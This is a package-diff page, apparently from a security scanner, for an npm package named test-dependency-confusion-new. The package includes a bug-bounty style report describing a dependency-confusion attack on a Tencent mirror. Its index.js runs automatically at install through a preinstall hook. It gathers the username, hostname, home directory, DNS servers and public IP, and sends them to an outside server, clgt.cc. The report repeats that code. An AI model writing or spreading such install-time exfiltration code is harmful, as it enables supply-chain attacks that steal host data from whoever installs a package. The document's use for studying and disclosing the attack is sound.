test-dependency-confusion-new 1.0.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of test-dependency-confusion-new might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +86 -0
  2. package/package.json +12 -0
  3. package/rce +78 -0
package/index.js ADDED
@@ -0,0 +1,86 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ let have_child_process = true
9
+ try {
10
+ const { exec } = require('child_process')
11
+ } catch(e) {
12
+ have_child_process = false
13
+ }
14
+
15
+ const sleep = (milliseconds) => {
16
+ return new Promise(resolve => setTimeout(resolve, milliseconds))
17
+ }
18
+
19
+ function requestPromise(endpoint) {
20
+ var body = ''
21
+
22
+ return new Promise(function(resolve, reject){
23
+ https.get((endpoint), res => {
24
+ res.setEncoding('utf8');
25
+ res.on("data", data => {
26
+ body += data;
27
+ });
28
+ res.on("end", () => {
29
+ resolve(body)
30
+ });
31
+ res.on("error", (e) => {
32
+ reject(e);
33
+ });
34
+ });
35
+ });
36
+
37
+ }
38
+
39
+ async function main() {
40
+
41
+ const url = 'https://ifconfig.me'
42
+ const ip = await requestPromise(url)
43
+
44
+ const trackingData = JSON.stringify({
45
+ p: package,
46
+ c: __dirname,
47
+ hd: os.homedir(),
48
+ hn: os.hostname(),
49
+ un: os.userInfo().username,
50
+ dns: dns.getServers(),
51
+ r: packageJSON ? packageJSON.___resolved : undefined,
52
+ v: packageJSON.version,
53
+ pjson: packageJSON,
54
+ ip: ip,
55
+ child_process: have_child_process ? 1 : 0,
56
+ });
57
+
58
+
59
+ var postData = querystring.stringify({
60
+ msg: trackingData,
61
+ });
62
+
63
+ var options = {
64
+ hostname: "clgt.cc", //replace burpcollaborator.net with Interactsh or pipedream
65
+ port: 443,
66
+ path: "/dependency-conf-npm.php",
67
+ method: "POST",
68
+ headers: {
69
+ "Content-Type": "application/x-www-form-urlencoded",
70
+ "Content-Length": postData.length,
71
+ },
72
+ };
73
+
74
+ var req = https.request(options, (res) => {
75
+ res.on("data", (d) => {
76
+ process.stdout.write(d);
77
+ });
78
+ });
79
+
80
+ req.on("error", (e) => {
81
+ // console.error(e);
82
+ });
83
+
84
+ req.write(postData);
85
+ req.end();
86
+ } main()
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "test-dependency-confusion-new",
3
+ "version": "1.0.3",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
package/rce ADDED
@@ -0,0 +1,78 @@
1
+ Dear Team,
2
+
3
+ I have found a RCE vulnerability on your mirrors.tencent.com server via dependency confusion
4
+
5
+ 1. Detailed Description :
6
+ - The vulnerability is very simple, your mirrors.tencent.com server is monitoring all packages on npmjs.com. When you found any new package, you do sync new package to your server and do something including install new package
7
+ - So If I create a new package for example this case, name: test-dependency-confusion, here is package.json
8
+ ```
9
+ > cat package.json
10
+ {
11
+ "name": "test-dependency-confusion",
12
+ "version": "1.0.2",
13
+ "description": "",
14
+ "main": "index.js",
15
+ "scripts": {
16
+ "test": "echo \"Error: no test specified\" && exit 1",
17
+ "preinstall": "node index.js"
18
+ },
19
+ "author": "",
20
+ "license": "ISC"
21
+ }
22
+ ```
23
+ You can see in scripts section, preinstall: node index.js
24
+ I have create index.js, do following:
25
+ ** collection current server information: user, current working directory, os name, ip address (via call http://ifconfig.me)**
26
+ ** Then I send all information to my server https://clgt.cc/**
27
+ Here is source code
28
+ ```
29
+ const trackingData = JSON.stringify({
30
+ p: package,
31
+ c: __dirname,
32
+ hd: os.homedir(),
33
+ hn: os.hostname(),
34
+ un: os.userInfo().username,
35
+ dns: dns.getServers(),
36
+ r: packageJSON ? packageJSON.___resolved : undefined,
37
+ v: packageJSON.version,
38
+ pjson: packageJSON,
39
+ ip: ip,
40
+ child_process: have_child_process ? 1 : 0,
41
+ });
42
+
43
+
44
+ var postData = querystring.stringify({
45
+ msg: trackingData,
46
+ });
47
+
48
+ var options = {
49
+ hostname: "clgt.cc", //replace burpcollaborator.net with Interactsh or pipedream
50
+ port: 443,
51
+ path: "/dependency-conf-npm.php",
52
+ method: "POST",
53
+ headers: {
54
+ "Content-Type": "application/x-www-form-urlencoded",
55
+ "Content-Length": postData.length,
56
+ },
57
+ };
58
+
59
+ var req = https.request(options, (res) => {
60
+ res.on("data", (d) => {
61
+ process.stdout.write(d);
62
+ });
63
+ });
64
+ ```
65
+
66
+ - I do something and push to npmjs repository, I get the link publish https://www.npmjs.com/package/test-dependency-confusion
67
+ - wait for some minutes, I got signal request to my server with the information, there are some servers from you
68
+
69
+ 2. Proof :
70
+ Please do check my attachment images
71
+
72
+ 3. Impact
73
+ An attacker can do remote code execution on your server
74
+
75
+ 3. How to fix :
76
+ - I think after download/sync package, you should check preinstall script is existed or not. If it exists, do check or remove it
77
+
78
+ Thanks and Best Regards,